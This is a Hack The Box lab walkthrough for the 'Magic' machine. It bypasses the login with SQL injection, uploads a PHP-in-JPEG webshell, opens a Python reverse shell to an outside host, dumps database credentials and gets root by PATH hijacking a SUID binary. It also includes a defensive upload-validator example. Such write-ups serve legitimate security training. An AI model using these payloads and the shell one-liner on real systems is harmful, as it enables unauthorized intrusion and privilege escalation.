HTB Walkthrough Magic 10.10.10.185

Enumeration
Nmap Scan
nmap -sV -sC 10.10.10.185

Web page

After this I ran gobuster, in order to enumerate the web page for files and directories.
gobuster dir -u http://10.10.10.185/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
We see some interesting pages:
upload.php
login.php
The login page.

Bypassing Login Page
We can bypass this login page with SQL injection.
Resource: https://portswigger.net/support/using-sql-injection-to-bypass-authentication
Username: ' or ''='
Password: ' or ''='
After we have logged into the website, we see an upload page where we can upload an image.

Exploitation
I first tried the simple upload bypass of appending .jpg to the end of the file name.

When I try to upload the image, I get the following banner.

After trying a few more things, I found the following resource:
https://github.com/jgor/php-jpeg-shell/blob/master/shell.php
I download it to my system.

If we can upload this, then we have an LFI.
First, we need to add the .jpg extension at the end of the file name.
mv shell.php shell.php.jpg
We upload the image.

It uploaded successfully.
Now we need to find where the file was uploaded to.
gobuster dir -u http://10.10.10.185/images -w /home/kali/Desktop/wordlists/dirbuster/directory-list-2.3-medium.txt
The place where the file is uploaded to is /images/uploads.

http://10.10.10.185/images/uploads/shell.php.jpg

Now we have code execution.
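The upload check was defeated because a file with a valid JPEG header, PHP code in its body and a double extension (shell.php.jpg) passes a magic-byte check, and the server still executes it as PHP. As an added example from the defender's side (not part of the original walkthrough, and not the box's own code), the following Python validator shows what a check would need to do: allow exactly one extension from an allowlist, require matching magic bytes, refuse image bodies that carry PHP or script tags, and never keep the client-supplied file name. The sample uploads are constructed inline.

```python
import re
import secrets

# Constructed sample uploads (not real captures): a minimal clean JPEG, and the
# same JPEG header followed by PHP code, which is how the polyglot shell passes
# a magic-byte-only check.
JPEG_MAGIC = b"\xff\xd8\xff"
CLEAN_JPEG = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 64 + b"\xff\xd9"
POLYGLOT = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"<?php system($_GET['cmd']); ?>"

# Allowlisted extensions with the magic bytes each one must start with.
ALLOWED = {"jpg": JPEG_MAGIC, "jpeg": JPEG_MAGIC, "png": b"\x89PNG\r\n\x1a\n"}

# Only full PHP open tags and <script> are matched; the bare short tag "<?" is
# left alone because legitimate JPEG XMP metadata starts with "<?xpacket", so
# short_open_tag must stay off on the server for this check to be meaningful.
CODE_TAG = re.compile(rb"<\?(php\b|=)|<script\b", re.IGNORECASE)


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an uploaded image."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        # shell.php.jpg has two extensions and is rejected here outright
        return False, "filename must be name.ext with exactly one extension"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "magic bytes do not match declared extension"
    if CODE_TAG.search(data):
        # defence in depth: a JPEG header with PHP after it is still not an image
        return False, "embedded code tag found in image body"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Store under a random name with the allowlisted extension, never the client's name."""
    ext = filename.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"
```

The content check is a second line of defence only: the upload directory must additionally be served without a PHP handler, otherwise any bypass of the validator becomes code execution again.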

Getting Reverse Shell
In order to get a reverse shell I used the following one-liner.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We can't read user.txt yet; we need to find credentials for the user theseus.

I found credentials in /var/www/Magic/db.php5.
The credentials are:
theseus:iamkingtheseus
I couldn't log in with these credentials.

Because these are credentials for a SQL database, I tried to dump the database with them.
mysqldump -utheseus -piamkingtheseus Magic

The dump contains new credentials:
admin:Th3s3usW4sK1ng
I couldn't log in as admin with Th3s3usW4sK1ng, but I could log in with:
theseus:Th3s3usW4sK1ng
whoami && ifconfig && cat user.txt; echo

Post-Exploitation
I ran the enumeration script lse.sh, serving it from my machine and fetching it on the target.
Kali System:
python3 -m http.server 80
Target System:
wget http://10.10.14.12/lse.sh

Then run the script:
bash lse.sh

We see an unusual SUID binary:
/bin/sysinfo
Creating a fake lshw
What sysinfo does: it reads the hardware configuration of the system (memory size, CPU, etc.) by calling other tools, such as lshw, by their bare name rather than an absolute path, so it picks them up from our PATH.
Resource: https://www.exploit-db.com/exploits/44150
What we need to do is the following:
- Create an lshw file that contains a reverse shell.
- Prepend the directory containing that file to our PATH.
- Run the sysinfo command and we get root.
Reverse Shell inside The File
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Setting Our Path
export PATH=/tmp/IceL0rd:$PATH


Getting Root Shell
sysinfo

whoami && ifconfig && cat root.txt; echo

Made by: IceL0rd
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.